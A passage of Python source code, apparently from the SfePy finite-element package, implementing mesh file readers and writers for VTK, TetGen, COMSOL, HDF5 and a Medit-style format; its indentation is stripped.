dim, fd = self.read_dimension(ret_fd=True)
conns_in = []
descs = []
def _read_cells(dimension, size, has_id=True):
num = int(read_token(fd))
data = read_array(fd, num, size + 1 * has_id, nm.int32)
if omit_facets and (dimension < dim): return
data[:, :-1] -= 1
conns_in.append(data)
descs.append('%i_%i' % (dimension, size))
while 1:
line = skip_read_line(fd).split()
if not line:
break
ls = line[0]
if (ls == 'Vertices'):
num = int(read_token(fd))
nod = read_array(fd, num, dim + 1, nm.float64)
elif (ls == 'Corners'):
_read_cells(1, 1, False)
elif (ls == 'Edges'):
_read_cells(1, 2)
elif (ls == 'Tetrahedra'):
_read_cells(3, 4)
elif (ls == 'Hexahedra'):
_read_cells(3, 8)
elif (ls == 'Triangles'):
_read_cells(2, 3)
elif (ls == 'Quadrilaterals'):
_read_cells(2, 4)
elif ls == 'End':
break
elif line[0] == '#':
continue
else:
output('skipping unknown entity: %s' % line)
continue
fd.close()
# Detect wedges and pyramides -> separate groups.
if ('3_8' in descs):
ic = descs.index('3_8')
conn_in = conns_in.pop(ic)
flag = nm.zeros((conn_in.shape[0],), nm.int32)
for ii, el in enumerate(conn_in):
if (el[4] == el[5]):
if (el[5] == el[6]):
flag[ii] = 2
else:
flag[ii] = 1
conn = []
desc = []
ib = nm.where(flag == 0)[0]
if (len(ib) > 0):
conn.append(conn_in[ib])
desc.append('3_8')
iw = nm.where(flag == 1)[0]
if (len(iw) > 0):
ar = nm.array([0,1,2,3,4,6], nm.int32)
conn.append(conn_in[iw[:, None], ar])
desc.append('3_6')
ip = nm.where(flag == 2)[0]
if (len(ip) > 0):
ar = nm.array([0,1,2,3,4], nm.int32)
conn.append(conn_in[ip[:, None], ar])
desc.append('3_5')
conns_in[ic:ic] = conn
del(descs[ic])
descs[ic:ic] = desc
conns, mat_ids = split_conns_mat_ids(conns_in)
mesh._set_io_data(nod[:,:-1], nod[:,-1], conns, mat_ids, descs)
return mesh
def write(self, filename, mesh, out=None, **kwargs):
fd = open(filename, 'w')
coors, ngroups, conns, mat_ids, desc = mesh._get_io_data()
n_nod, dim = coors.shape
fd.write("MeshVersionFormatted 1\nDimension %d\n" % dim)
fd.write("Vertices\n%d\n" % n_nod)
format = self.get_vector_format(dim) + ' %d\n'
for ii in range(n_nod):
nn = tuple(coors[ii]) + (ngroups[ii],)
fd.write(format % tuple(nn))
for ig, conn in enumerate(conns):
ids = mat_ids[ig]
if (desc[ig] == "1_1"):
fd.write("Corners\n%d\n" % conn.shape[0])
for ii in range(conn.shape[0]):
nn = conn[ii] + 1
fd.write("%d\n"
% nn[0])
elif (desc[ig] == "1_2"):
fd.write("Edges\n%d\n" % conn.shape[0])
for ii in range(conn.shape[0]):
nn = conn[ii] + 1
fd.write("%d %d %d\n"
% (nn[0], nn[1], ids[ii]))
elif (desc[ig] == "2_4"):
fd.write("Quadrilaterals\n%d\n" % conn.shape[0])
for ii in range(conn.shape[0]):
nn = conn[ii] + 1
fd.write("%d %d %d %d %d\n"
% (nn[0], nn[1], nn[2], nn[3], ids[ii]))
elif (desc[ig] == "2_3"):
fd.write("Triangles\n%d\n" % conn.shape[0])
for ii in range(conn.shape[0]):
nn = conn[ii] + 1
fd.write("%d %d %d %d\n" % (nn[0], nn[1], nn[2], ids[ii]))
elif (desc[ig] == "3_4"):
fd.write("Tetrahedra\n%d\n" % conn.shape[0])
for ii in range(conn.shape[0]):
nn = conn[ii] + 1
fd.write("%d %d %d %d %d\n"
% (nn[0], nn[1], nn[2], nn[3], ids[ii]))
elif (desc[ig] == "3_8"):
fd.write("Hexahedra\n%d\n" % conn.shape[0])
for ii in range(conn.shape[0]):
nn = conn[ii] + 1
fd.write("%d %d %d %d %d %d %d %d %d\n"
% (nn[0], nn[1], nn[2], nn[3], nn[4], nn[5],
nn[6], nn[7], ids[ii]))
else:
raise ValueError('unknown element type! (%s)' % desc[ig])
fd.close()
if out is not None:
for key, val in out.iteritems():
raise NotImplementedError
vtk_header = r"""x vtk DataFile Version 2.0
step %d time %e normalized time %e, generated by %s
ASCII
DATASET UNSTRUCTURED_GRID
"""
vtk_cell_types = {'1_1' : 1, '1_2' : 3, '2_2' : 3, '3_2' : 3,
'2_3' : 5, '2_4' : 9, '3_4' : 10, '3_8' : 12}
vtk_dims = {1 : 1, 3 : 1, 5 : 2, 9 : 2, 10 : 3, 12 : 3}
vtk_inverse_cell_types = {3 : '1_2', 5 : '2_3', 8 : '2_4', 9 : '2_4',
10 : '3_4', 11 : '3_8', 12 : '3_8'}
vtk_remap = {8 : nm.array([0, 1, 3, 2], dtype=nm.int32),
11 : nm.array([0, 1, 3, 2, 4, 5, 7, 6], dtype=nm.int32)}
vtk_remap_keys = vtk_remap.keys()
class VTKMeshIO(MeshIO):
format = 'vtk'
def read_coors(self, ret_fd=False):
fd = open(self.filename, 'r')
while 1:
line = skip_read_line(fd, no_eof=True).split()
if line[0] == 'POINTS':
n_nod = int(line[1])
coors = read_array(fd, n_nod, 3, nm.float64)
break
if ret_fd:
return coors, fd
else:
fd.close()
return coors
def get_dimension(self, coors):
dz = nm.diff(coors[:,2])
if nm.allclose(dz, 0.0):
dim = 2
else:
dim = 3
return dim
def read_dimension(self, ret_fd=False):
coors, fd = self.read_coors(ret_fd=True)
dim = self.get_dimension(coors)
if ret_fd:
return dim, fd
else:
fd.close()
return dim
def read_bounding_box(self, ret_fd=False, ret_dim=False):
coors, fd = self.read_coors(ret_fd=True)
dim = self.get_dimension(coors)
bbox = nm.vstack((nm.amin(coors[:,:dim], 0),
nm.amax(coors[:,:dim], 0)))
if ret_dim:
if ret_fd:
return bbox, dim, fd
else:
fd.close()
return bbox, dim
else:
if ret_fd:
return bbox, fd
else:
fd.close()
return bbox
def read(self, mesh, **kwargs):
fd = open(self.filename, 'r')
mode = 'header'
mode_status = 0
coors = conns = mat_id = node_grps = None
finished = 0
while 1:
line = skip_read_line(fd)
if not line:
break
if mode == 'header':
if mode_status == 0:
if line.strip() == 'ASCII':
mode_status = 1
elif mode_status == 1:
if line.strip() == 'DATASET UNSTRUCTURED_GRID':
mode_status = 0
mode = 'points'
elif mode == 'points':
line = line.split()
if line[0] == 'POINTS':
n_nod = int(line[1])
coors = read_array(fd, n_nod, 3, nm.float64)
mode = 'cells'
elif mode == 'cells':
line = line.split()
if line[0] == 'CELLS':
n_el, n_val = map(int, line[1:3])
raw_conn = read_list(fd, n_val, int)
mode = 'cell_types'
elif mode == 'cell_types':
line = line.split()
if line[0] == 'CELL_TYPES':
assert_(int(line[1]) == n_el)
cell_types = read_array(fd, n_el, 1, nm.int32)
mode = 'cp_data'
elif mode == 'cp_data':
line = line.split()
if line[0] == 'CELL_DATA':
assert_(int(line[1]) == n_el)
mode_status = 1
mode = 'mat_id'
elif line[0] == 'POINT_DATA':
assert_(int(line[1]) == n_nod)
mode_status = 1
mode = 'node_groups'
elif mode == 'mat_id':
if mode_status == 1:
if 'SCALARS mat_id int' in line.strip():
mode_status = 2
elif mode_status == 2:
if line.strip() == 'LOOKUP_TABLE default':
mat_id = read_list(fd, n_el, int)
mode_status = 0
mode = 'cp_data'
finished += 1
elif mode == 'node_groups':
if mode_status == 1:
if 'SCALARS node_groups int' in line.strip():
mode_status = 2
elif mode_status == 2:
if line.strip() == 'LOOKUP_TABLE default':
node_grps = read_list(fd, n_nod, int)
mode_status = 0
mode = 'cp_data'
finished += 1
elif finished >= 2:
break
fd.close()
if mat_id is None:
mat_id = [[0]] * n_el
else:
if len(mat_id) < n_el:
mat_id = [[ii] for jj in mat_id for ii in jj]
if node_grps is None:
node_grps = [0] * n_nod
else:
if len(node_grps) < n_nod:
node_grps = [ii for jj in node_grps for ii in jj]
dim = self.get_dimension(coors)
if dim == 2:
coors = coors[:,:2]
coors = nm.ascontiguousarray(coors)
cell_types = cell_types.squeeze()
dconns = {}
for iel, row in enumerate(raw_conn):
vct = cell_types[iel]
if vct not in vtk_inverse_cell_types:
continue
ct = vtk_inverse_cell_types[vct]
dconns.setdefault(vct, []).append(row[1:] + mat_id[iel])
descs = []
conns = []
mat_ids = []
for ct, conn in dconns.iteritems():
sct = vtk_inverse_cell_types[ct]
descs.append(sct)
aux = nm.array(conn, dtype=nm.int32)
aconn = aux[:, :-1]
if ct in vtk_remap_keys: # Remap pixels and voxels.
aconn[:] = aconn[:, vtk_remap[ct]]
conns.append(aconn)
mat_ids.append(aux[:, -1])
mesh._set_io_data(coors, node_grps, conns, mat_ids, descs)
return mesh
def write(self, filename, mesh, out=None, ts=None, **kwargs):
def _reshape_tensors(data, dim, sym, nc):
if dim == 3:
if nc == sym:
aux = data[:, [0,3,4,3,1,5,4,5,2]]
elif nc == (dim * dim):
aux = data[:, [0,3,4,6,1,5,7,8,2]]
else:
aux = data.reshape((data.shape[0], dim*dim))
else:
zz = nm.zeros((data.shape[0], 1), dtype=nm.float64)
if nc == sym:
aux = nm.c_[data[:,[0,2]], zz, data[:,[2,1]],
zz, zz, zz, zz]
elif nc == (dim * dim):
aux = nm.c_[data[:,[0,2]], zz, data[:,[3,1]],
zz, zz, zz, zz]
else:
aux = nm.c_[data[:,0,[0,1]], zz, data[:,1,[0,1]],
zz, zz, zz, zz]
return aux
def _write_tensors(data):
format = self.get_vector_format(3)
format = '\n'.join([format] * 3) + '\n\n'
for row in aux:
fd.write(format % tuple(row))
if ts is None:
step, time, nt = 0, 0.0, 0.0
else:
step, time, nt = ts.step, ts.time, ts.nt
coors, ngroups, conns, mat_ids, descs = mesh._get_io_data()
fd = open(filename, 'w')
fd.write(vtk_header % (step, time, nt, op.basename(sys.argv[0])))
n_nod, dim = coors.shape
sym = dim * (dim + 1) / 2
fd.write('\nPOINTS %d float\n' % n_nod)
aux = coors
if dim < 3:
aux = nm.hstack((aux, nm.zeros((aux.shape[0], 3 - dim),
dtype=aux.dtype)))
format = self.get_vector_format(3) + '\n'
for row in aux:
fd.write(format % tuple(row))
n_el = mesh.n_el
n_els, n_e_ps = nm.array([conn.shape for conn in conns]).T
total_size = nm.dot(n_els, n_e_ps + 1)
fd.write('\nCELLS %d %d\n' % (n_el, total_size))
ct = []
for ig, conn in enumerate(conns):
nn = n_e_ps[ig] + 1
ct += [vtk_cell_types[descs[ig]]] * n_els[ig]
format = ' '.join(['%d'] * nn + ['\n'])
for row in conn:
fd.write(format % ((nn-1,) + tuple(row)))
fd.write('\nCELL_TYPES %d\n' % n_el)
fd.write(''.join(['%d\n' % ii for ii in ct]))
fd.write('\nPOINT_DATA %d\n' % n_nod)
# node groups
fd.write('\nSCALARS node_groups int 1\nLOOKUP_TABLE default\n')
fd.write(''.join(['%d\n' % ii for ii in ngroups]))
if out is not None:
point_keys = [key for key, val in out.iteritems()
if val.mode == 'vertex']
else:
point_keys = {}
for key in point_keys:
val = out[key]
nr, nc = val.data.shape
if nc == 1:
fd.write('\nSCALARS %s float %d\n' % (key, nc))
fd.write('LOOKUP_TABLE default\n')
format = self.float_format + '\n'
for row in val.data:
fd.write(format % row)
elif nc == dim:
fd.write('\nVECTORS %s float\n' % key)
if dim == 2:
aux = nm.hstack((val.data,
nm.zeros((nr, 1), dtype=nm.float64)))
else:
aux = val.data
format = self.get_vector_format(3) + '\n'
for row in aux:
fd.write(format % tuple(row))
elif (nc == sym) or (nc == (dim * dim)):
fd.write('\nTENSORS %s float\n' % key)
aux = _reshape_tensors(val.data, dim, sym, nc)
_write_tensors(aux)
else:
raise NotImplementedError, nc
if out is not None:
cell_keys = [key for key, val in out.iteritems()
if val.mode == 'cell']
else:
cell_keys = {}
fd.write('\nCELL_DATA %d\n' % n_el)
# cells - mat_id
fd.write('SCALARS mat_id int 1\nLOOKUP_TABLE default\n')
aux = nm.hstack(mat_ids).tolist()
fd.write(''.join(['%d\n' % ii for ii in aux]))
for key in cell_keys:
val = out[key]
ne, aux, nr, nc = val.data.shape
if (nr == 1) and (nc == 1):
fd.write('\nSCALARS %s float %d\n' % (key, nc))
fd.write('LOOKUP_TABLE default\n')
format = self.float_format + '\n'
aux = val.data.squeeze()
if len(aux.shape) == 0:
fd.write(format % aux)
else:
for row in aux:
fd.write(format % row)
elif (nr == dim) and (nc == 1):
fd.write('\nVECTORS %s float\n' % key)
if dim == 2:
aux = nm.hstack((val.data.squeeze(),
nm.zeros((ne, 1), dtype=nm.float64)))
else:
aux = val.data
format = self.get_vector_format(3) + '\n'
for row in aux:
fd.write(format % tuple(row.squeeze()))
elif (((nr == sym) or (nr == (dim * dim))) and (nc == 1)) \
or ((nr == dim) and (nc == dim)):
fd.write('\nTENSORS %s float\n' % key)
data = val.data.squeeze()
aux = _reshape_tensors(data, dim, sym, nr)
_write_tensors(aux)
else:
raise NotImplementedError, (nr, nc)
fd.close()
# Mark the write finished.
fd = open(filename, 'r+')
fd.write('#')
fd.close()
def read_data(self, step, filename=None):
"""Point data only!"""
filename = get_default(filename, self.filename)
out = {}
fd = open(self.filename, 'r')
while 1:
line = skip_read_line(fd, no_eof=True).split()
if line[0] == 'POINT_DATA':
break
n_nod = int(line[1])
while 1:
line = skip_read_line(fd)
if not line:
break
line = line.split()
if line[0] == 'SCALARS':
name, dtype, nc = line[1:]
assert_(int(nc) == 1)
fd.readline() # skip lookup table line
data = nm.zeros((n_nod,), dtype=nm.float64)
ii = 0
while ii < n_nod:
data[ii] = float(fd.readline())
ii += 1
out[name] = Struct(name=name, mode='vertex', data=data,
dofs=None)
elif line[0] == 'VECTORS':
name, dtype = line[1:]
data = []
ii = 0
while ii < n_nod:
data.append([float(val) for val in fd.readline().split()])
ii += 1
out[name] = Struct(name=name, mode='vertex',
data=nm.array(data, dtype=nm.float64),
dofs=None)
elif line[0] == 'CELL_DATA':
break
line = fd.readline()
fd.close()
return out
class TetgenMeshIO(MeshIO):
format = "tetgen"
def read(self, mesh, **kwargs):
import os
fname = os.path.splitext(self.filename)[0]
nodes = self.getnodes(fname+".node")
etype, elements, regions = self.getele(fname+".ele")
descs = []
conns = []
mat_ids = []
elements = nm.array(elements, dtype=nm.int32) - 1
for key, value in regions.iteritems():
descs.append(etype)
mat_ids.append(nm.ones_like(value) * key)
conns.append(elements[nm.array(value)-1].copy())
mesh._set_io_data(nodes, None, conns, mat_ids, descs)
return mesh
@staticmethod
def getnodes(fnods):
"""
Reads t.1.nodes, returns a list of nodes.
Example:
>>> self.getnodes("t.1.node")
[(0.0, 0.0, 0.0), (4.0, 0.0, 0.0), (0.0, 4.0, 0.0), (-4.0, 0.0, 0.0),
(0.0, 0.0, 4.0), (0.0, -4.0, 0.0), (0.0, -0.0, -4.0), (-2.0, 0.0,
-2.0), (-2.0, 2.0, 0.0), (0.0, 2.0, -2.0), (0.0, -2.0, -2.0), (2.0,
0.0, -2.0), (2.0, 2.0, 0.0), ... ]
"""
f = open(fnods)
l = [int(x) for x in f.readline().split()]
npoints, dim, nattrib, nbound = l
if dim == 2:
ndapp = [0.0]
else:
ndapp = []
nodes = []
for line in f:
if line[0] == "#": continue
l = [float(x) for x in line.split()]
l = l[:(dim + 1)]
assert_(int(l[0]) == len(nodes)+1)
l = l[1:]
nodes.append(tuple(l + ndapp))
assert_(npoints == len(nodes))
return nodes
@staticmethod
def getele(fele):
"""
Reads t.1.ele, returns a list of elements.
Example:
>>> elements, regions = self.getele("t.1.ele")
>>> elements
[(20, 154, 122, 258), (86, 186, 134, 238), (15, 309, 170, 310), (146,
229, 145, 285), (206, 207, 125, 211), (99, 193, 39, 194), (185, 197,
158, 225), (53, 76, 74, 6), (19, 138, 129, 313), (23, 60, 47, 96),
(119, 321, 1, 329), (188, 296, 122, 322), (30, 255, 177, 256), ...]
>>> regions
{100: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18,
19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36,
37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54,
55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 7, ...],
...}
"""
f = file(fele)
l = [int(x) for x in f.readline().split()]
ntetra,nnod,nattrib = l
#we have either linear or quadratic tetrahedra:
elem = None
if nnod in [4,10]:
elem = '3_4'
linear = (nnod == 4)
if nnod in [3, 7]:
elem = '2_3'
linear = (nnod == 3)
if elem is None or not linear:
raise ValueError("Only linear triangle and tetrahedra reader"
" is implemented")
els = []
regions = {}
for line in f:
if line[0] == "#": continue
l = [int(x) for x in line.split()]
if elem == '2_3':
assert_((len(l) - 1 - nattrib) == 3)
els.append((l[1],l[2],l[3]))
if elem == '3_4':
assert_((len(l) - 1 - nattrib) == 4)
els.append((l[1],l[2],l[3],l[4]))
if nattrib == 1:
regionnum = l[-1]
else:
regionnum = 1
if regionnum == 0:
msg = "see %s, element # %d\n"%(fele,l[0])
msg += "there are elements not belonging to any physical entity"
raise ValueError(msg)
if regions.has_key(regionnum):
regions[regionnum].append(l[0])
else:
regions[regionnum]=[l[0]]
assert_(l[0] == len(els))
return elem, els, regions
def write(self, filename, mesh, out=None, **kwargs):
raise NotImplementedError
def read_dimension(self):
# TetGen only supports 3D mesh
return 3
def read_bounding_box(self):
raise NotImplementedError
class ComsolMeshIO(MeshIO):
format = 'comsol'
def _read_commented_int(self):
return int(skip_read_line(self.fd).split('#')[0])
def _skip_comment(self):
read_token(self.fd)
self.fd.readline()
def read(self, mesh, **kwargs):
self.fd = fd = open(self.filename, 'r')
mode = 'header'
coors = conns = None
while 1:
if mode == 'header':
line = skip_read_line(fd)
n_tags = self._read_commented_int()
for ii in xrange(n_tags):
skip_read_line(fd)
n_types = self._read_commented_int()
for ii in xrange(n_types):
skip_read_line(fd)
skip_read_line(fd)
assert_(skip_read_line(fd).split()[1] == 'Mesh')
skip_read_line(fd)
dim = self._read_commented_int()
assert_((dim == 2) or (dim == 3))
n_nod = self._read_commented_int()
i0 = self._read_commented_int()
mode = 'points'
elif mode == 'points':
self._skip_comment()
coors = read_array(fd, n_nod, dim, nm.float64)
mode = 'cells'
elif mode == 'cells':
n_types = self._read_commented_int()
conns = []
descs = []
mat_ids = []
for it in xrange(n_types):
t_name = skip_read_line(fd).split()[1]
n_ep = self._read_commented_int()
n_el = self._read_commented_int()
self._skip_comment()
aux = read_array(fd, n_el, n_ep, nm.int32)
if t_name == 'tri':
conns.append(aux)
descs.append('2_3')
is_conn = True
elif t_name == 'quad':
# Rearrange element node order to match SfePy.
aux = aux[:,(0,1,3,2)]
conns.append(aux)
descs.append('2_4')
is_conn = True
elif t_name == 'hex':
# Rearrange element node order to match SfePy.
aux = aux[:,(0,1,3,2,4,5,7,6)]
conns.append(aux)
descs.append('3_8')
is_conn = True
elif t_name == 'tet':
conns.append(aux)
descs.append('3_4')
is_conn = True
else:
is_conn = False
# Skip parameters.
n_pv = self._read_commented_int()
n_par = self._read_commented_int()
for ii in xrange(n_par):
skip_read_line(fd)
n_domain = self._read_commented_int()
assert_(n_domain == n_el)
if is_conn:
self._skip_comment()
mat_id = read_array(fd, n_domain, 1, nm.int32)
mat_ids.append(mat_id)
else:
for ii in xrange(n_domain):
skip_read_line(fd)
# Skip up/down pairs.
n_ud = self._read_commented_int()
for ii in xrange(n_ud):
skip_read_line(fd)
break
fd.close()
self.fd = None
mesh._set_io_data(coors, None, conns, mat_ids, descs)
return mesh
def write(self, filename, mesh, out=None, **kwargs):
def write_elements(fd, ig, conn, mat_ids, type_name,
npe, format, norder, nm_params):
fd.write("# Type #%d\n\n" % ig)
fd.write("%s # type name\n\n\n" % type_name)
fd.write("%d # number of nodes per element\n" % npe)
fd.write("%d # number of elements\n" % conn.shape[0])
fd.write("# Elements\n")
for ii in range(conn.shape[0]):
nn = conn[ii] # Zero based
fd.write(format % tuple(nn[norder]))
fd.write("\n%d # number of parameter values per element\n"
% nm_params)
# Top level always 0?
fd.write("0 # number of parameters\n")
fd.write("# Parameters\n\n")
fd.write("%d # number of domains\n"
% sum([mi.shape[0] for mi in mat_ids]))
fd.write("# Domains\n")
for mi in mat_ids:
# Domains in comsol have to be > 0
if (mi <= 0).any():
mi += mi.min() + 1
for dom in mi:
fd.write("%d\n" % abs(dom))
fd.write("\n0 # number of up/down pairs\n")
fd.write("# Up/down\n")
fd = open(filename, 'w')
coors, ngroups, conns, mat_ids, desc = mesh._get_io_data()
n_nod, dim = coors.shape
# Header
fd.write("# Created by SfePy\n\n\n")
fd.write("# Major & minor version\n")
fd.write("0 1\n")
fd.write("1 # number of tags\n")
fd.write("# Tags\n")
fd.write("2 m1\n")
fd.write("1 # number of types\n")
fd.write("# Types\n")
fd.write("3 obj\n\n")
# Record
fd.write("# --------- Object 0 ----------\n\n")
fd.write("0 0 1\n") # version unused serializable
fd.write("4 Mesh # class\n")
fd.write("1 # version\n")
fd.write("%d # sdim\n" % dim)
fd.write("%d # number of mesh points\n" % n_nod)
fd.write("0 # lowest mesh point index\n\n") # Always zero in SfePy
fd.write("# Mesh point coordinates\n")
format = self.get_vector_format(dim) + '\n'
for ii in range(n_nod):
nn = tuple(coors[ii])
fd.write(format % tuple(nn))
fd.write("\n%d # number of element types\n\n\n" % len(conns))
for ig, conn in enumerate(conns):
if (desc[ig] == "2_4"):
write_elements(fd, ig, conn, mat_ids,
"4 quad", 4, "%d %d %d %d\n", [0, 1, 3, 2], 8)
elif (desc[ig] == "2_3"):
# TODO: Verify number of parameters for tri element
write_elements(fd, ig, conn, mat_ids,
"3 tri", 3, "%d %d %d\n", [0, 1, 2], 4)
elif (desc[ig] == "3_4"):
# TODO: Verify number of parameters for tet element
write_elements(fd, ig, conn, mat_ids,
"3 tet", 4, "%d %d %d %d\n", [0, 1, 2, 3], 16)
elif (desc[ig] == "3_8"):
write_elements(fd, ig, conn, mat_ids,
"3 hex", 8, "%d %d %d %d %d %d %d %d\n",
[0, 1, 3, 2, 4, 5, 7, 6], 24)
else:
raise ValueError('unknown element type! (%s)' % desc[ig])
fd.close()
if out is not None:
for key, val in out.iteritems():
raise NotImplementedError
class HDF5MeshIO(MeshIO):
format = "hdf5"
import string
_all = ''.join(map(chr, range(256)))
_letters = string.letters + string.digits + '_'
_rubbish = ''.join([ch for ch in set(_all) - set(_letters)])
_tr = string.maketrans(_rubbish, '_' * len(_rubbish))
def read_dimension(self, ret_fd=False):
fd = pt.openFile(self.filename, mode="r")
dim = fd.root.mesh.coors.shape[1]
if ret_fd:
return dim, fd
else:
fd.close()
return dim
def read_bounding_box(self, ret_fd=False, ret_dim=False):
fd = pt.openFile(self.filename, mode="r")
mesh_group = fd.root.mesh
coors = mesh_group.coors.read()
bbox = nm.vstack((nm.amin(coors, 0),
nm.amax(coors, 0)))
if ret_dim:
dim = coors.shape[1]
if ret_fd:
return bbox, dim, fd
else:
fd.close()
return bbox, dim
else:
if ret_fd:
return bbox, fd
else:
fd.close()
return bbox
def read(self, mesh, **kwargs):
fd = pt.openFile(self.filename, mode="r")
mesh_group = fd.root.mesh
mesh.name = mesh_group.name.read()
coors = mesh_group.coors.read()
ngroups = mesh_group.ngroups.read()
n_gr = mesh_group.n_gr.read()
conns = []
descs = []
mat_ids = []
for ig in xrange(n_gr):
gr_name = 'group%d' % ig
group = mesh_group._f_getChild(gr_name)
conns.append(group.conn.read())
mat_ids.append(group.mat_id.read())
descs.append(group.desc.read())
nodal_bcs = {}
try:
node_sets_groups = mesh_group.node_sets
except:
pass
else:
for group in node_sets_groups:
key = group.key.read()
nods = group.nods.read()
nodal_bcs[key] = nods
fd.close()
mesh._set_io_data(coors, ngroups, conns, mat_ids, descs,
nodal_bcs=nodal_bcs)
return mesh
def write(self, filename, mesh, out=None, ts=None, **kwargs):
from time import asctime
if pt is None:
raise ValueError('pytables not imported!')
step = get_default_attr(ts, 'step', 0)
if step == 0:
# A new file.
fd = pt.openFile(filename, mode="w",
title="SfePy output file")
mesh_group = fd.createGroup('/', 'mesh', 'mesh')
coors, ngroups, conns, mat_ids, descs = mesh._get_io_data()
fd.createArray(mesh_group, 'name', mesh.name, 'name')
fd.createArray(mesh_group, 'coors', coors, 'coors')
fd.createArray(mesh_group, 'ngroups', ngroups, 'ngroups')
fd.createArray(mesh_group, 'n_gr', len(conns), 'n_gr')
for ig, conn in enumerate(conns):
conn_group = fd.createGroup(mesh_group, 'group%d' % ig,
'connectivity group')
fd.createArray(conn_group, 'conn', conn, 'connectivity')
fd.createArray(conn_group, 'mat_id', mat_ids[ig],
'material id')
fd.createArray(conn_group, 'desc', descs[ig],
'element Type')
node_sets_groups = fd.createGroup(mesh_group, 'node_sets',
'node sets groups')
ii = 0
for key, nods in mesh.nodal_bcs.iteritems():
group = fd.createGroup(node_sets_groups, 'group%d' % ii,
'node sets group')
fd.createArray(group, 'key', key, 'key')
fd.createArray(group, 'nods', nods, 'nods')
ii += 1
if ts is not None:
ts_group = fd.createGroup('/', 'ts', 'time stepper')
fd.createArray(ts_group, 't0', ts.t0, 'initial time')
fd.createArray(ts_group, 't1', ts.t1, 'final time' )
fd.createArray(ts_group, 'dt', ts.dt, 'time step')
fd.createArray(ts_group, 'n_step', ts.n_step, 'n_step')
tstat_group = fd.createGroup('/', 'tstat', 'global time statistics')
fd.createArray(tstat_group, 'created', asctime(),
'file creation time')
fd.createArray(tstat_group, 'finished', '.' * 24,
'file closing time')
fd.createArray(fd.root, 'last_step', nm.array([0], dtype=nm.int32),
'last saved step')
fd.close()
if out is not None:
if ts is None:
step, time, nt = 0, 0.0, 0.0
else:
step, time, nt = ts.step, ts.time, ts.nt
# Existing file.
fd = pt.openFile(filename, mode="r+")
step_group = fd.createGroup('/', 'step%d' % step, 'time step data')
ts_group = fd.createGroup(step_group, 'ts', 'time stepper')
fd.createArray(ts_group, 'step', step, 'step')
fd.createArray(ts_group, 't', time, 'time')
fd.createArray(ts_group, 'nt', nt, 'normalized time')
name_dict = {}
for key, val in out.iteritems():
shape = val.get('shape', val.data.shape)
dofs = val.get('dofs', None)
if dofs is None:
dofs = [''] * nm.squeeze(shape)[-1]
var_name = val.get('var_name', '')
name = val.get('name', 'output_data')
group_name = '__' + key.translate(self._tr)
data_group = fd.createGroup(step_group, group_name,
'%s data' % key)
fd.createArray(data_group, 'data', val.data, 'data')
fd.createArray(data_group, 'mode', val.mode, 'mode')
fd.createArray(data_group, 'dofs', dofs, 'dofs')
fd.createArray(data_group, 'shape', shape, 'shape')
fd.createArray(data_group, 'name', name, 'object name')
fd.createArray(data_group, 'var_name',
var_name, 'object parent name')
fd.createArray(data_group, 'dname', key, 'data name')
if val.mode == 'full':
fd.createArray(data_group, 'field_name', val.field_name,
'field name')
name_dict[key] = group_name
step_group._v_attrs.name_dict = name_dict
fd.root.last_step[0] = step
fd.removeNode(fd.root.tstat.finished)
fd.createArray(fd.root.tstat, 'finished', asctime(),
'file closing time')
fd.close()
def read_last_step(self, filename=None):
filename = get_default(filename, self.filename)
fd = pt.openFile(filename, mode="r")
last_step = fd.root.last_step[0]
fd.close()
return last_step
def read_time_stepper(self, filename=None):
filename = get_default(filename, self.filename)
fd = pt.openFile(filename, mode="r")
try:
ts_group = fd.root.ts
out = (ts_group.t0.read(), ts_group.t1.read(),
ts_group.dt.read(), ts_group.n_step.read())
except:
raise ValueError('no time stepper found!')
finally:
fd.close()
return out
def read_times(self, filename=None):
"""
Read true time step data from individual time steps.
Returns
-------
steps : array
The time steps.
times : array
The times of the time steps.
nts : array
The normalized times of the time steps, in [0, 1].
"""
filename = get_default(filename, self.filename)
fd = pt.openFile(filename, mode='r')
steps = sorted(int(name[4:]) for name in fd.root._v_groups.keys()
if name.startswith('step'))
times = []
nts = []
for step in steps:
ts_group = fd.getNode(fd.root, 'step%d/ts' % step)
times.append(ts_group.t.read())
nts.append(ts_group.nt.read())
fd.close()
steps = nm.asarray(steps, dtype=nm.int32)
times = nm.asarray(times, dtype=nm.float64)
nts = nm.asarray(nts, dtype=nm.float64)
return steps, times, nts
def _get_step_group(self, step, filename=None):
filename = get_default(filename, self.filename)
fd = pt.openFile(filename, mode="r")
gr_name = 'step%d' % step
try:
step_group = fd.getNode(fd.root, gr_name)
except:
output('step %d data not found - premature end of file?' % step)
fd.close()
return None, None
return fd, step_group
def read_data(self, step, filename=None):
fd, step_group = self._get_step_group(step, filename=filename)
if fd is None: return None
out = {}
for data_group in step_group:
try:
key = data_group.dname.read()
except pt.exceptions.NoSuchNodeError:
continue
name = data_group.name.read()
mode = data_group.mode.read()
data = data_group.data.read()
dofs = tuple(data_group.dofs.read())
try:
shape = tuple(data_group.shape.read())
except pt.exceptions.NoSuchNodeError:
shape = data.shape
if mode == 'full':
field_name = data_group.field_name.read()
else:
field_name = None
out[key] = Struct(name=name, mode=mode, data=data,
dofs=dofs, shape=shape, field_name=field_name)
if out[key].dofs == (-1,):
out[key].dofs = None
fd.close()
return out
def read_data_header(self, dname, step=0, filename=None):
fd, step_group = self._get_step_group(step, filename=filename)
if fd is None: return None
groups = step_group._v_groups
for name, data_group in groups.iteritems():
try:
key = data_group.dname.read()
except pt.exceptions.NoSuchNodeError:
continue
if key == dname:
mode = data_group.mode.read()
fd.close()
return mode, name
fd.close()
raise KeyError('non-existent data: %s' % dname)
def read_time_history(self, node_name, indx, filename=None):
filename = get_default(filename, self.filename)
fd = pt.openFile(filename, mode="r")
th = dict_from_keys_init(indx, list)
for step in xrange(fd.root.last_step[0] + 1):
gr_name = 'step%d' % step
step_group = fd.getNode(fd.root, gr_name)
data = step_group._f_getChild(node_name).data
for ii in indx:
th[ii].append(nm.array(data[ii]))
fd.close()
for key, val in th.iteritems():
aux = nm.array(val)
if aux.ndim == 4: # cell data.
aux = aux[:,0,:,0]
th[key] = aux
return th
def read_variables_time_history(self, var_names, ts, filename=None):
filename = get_default(filename, self.filename)
fd = pt.openFile(filename, mode="r")
